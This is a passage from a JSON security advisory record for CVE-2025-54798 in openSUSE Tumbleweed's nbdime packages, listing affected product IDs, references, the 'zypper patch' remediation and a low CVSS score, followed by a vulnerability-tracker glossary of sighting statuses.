"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54798",
"url": "https://www.suse.com/security/cve/CVE-2025-54798"
},
{
"category": "external",
"summary": "SUSE Bug 1247787 for CVE-2025-54798",
"url": "https://bugzilla.suse.com/1247787"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-29T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54798"
}
]
}
Sightings
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.